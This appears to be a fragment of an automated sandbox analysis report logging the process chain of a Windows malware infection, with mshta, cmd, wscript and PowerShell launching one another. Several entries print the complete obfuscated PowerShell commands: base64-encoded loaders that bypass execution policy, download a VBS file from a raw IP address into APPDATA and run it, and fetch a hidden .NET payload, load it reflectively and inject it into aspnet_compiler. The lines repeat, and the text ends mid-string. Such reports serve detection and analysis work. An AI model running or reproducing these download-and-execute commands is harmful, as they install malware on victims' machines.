INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernardaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcics